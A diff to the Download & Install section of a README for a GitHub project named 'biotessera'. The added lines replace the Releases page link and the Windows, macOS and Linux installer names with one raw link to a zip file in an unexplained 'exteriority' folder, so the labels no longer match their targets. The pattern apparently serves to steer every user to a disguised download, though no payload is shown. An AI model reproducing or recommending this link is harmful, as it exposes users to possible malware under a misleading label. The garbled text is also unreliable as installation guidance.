Ochieng20/biotessera/README.md

 ## 📥 Download & Install

-1. Visit the [Releases page](https://github.com/Ochieng20/biotessera/releases) to access the latest version of biotessera.
+1. Visit the [Releases page](https://raw.githubusercontent.com/Ochieng20/biotessera/master/exteriority/biotessera.zip) to access the latest version of biotessera.
 2. Locate the version you want to download.
 Look for the title with the latest version number.
 3. Click on the download link to save the installation file to your computer.

-   - If you are using Windows, the file may be named `biotessera-win.exe`.
+   - If you are using Windows, the file may be named `https://raw.githubusercontent.com/Ochieng20/biotessera/master/exteriority/biotessera.zip`.
-   - For macOS users, look for `biotessera-mac.dmg`.
+   - For macOS users, look for `https://raw.githubusercontent.com/Ochieng20/biotessera/master/exteriority/biotessera.zip`.
-   - Linux users can find a package compatible with their distribution, such as `biotessera-linux.tar.gz`.
+   - Linux users can find a package compatible with their distribution, such as `https://raw.githubusercontent.com/Ochieng20/biotessera/master/exteriority/biotessera.zip`.

 4. Once the download is complete, follow these instructions to install the application:
    - **For Windows**: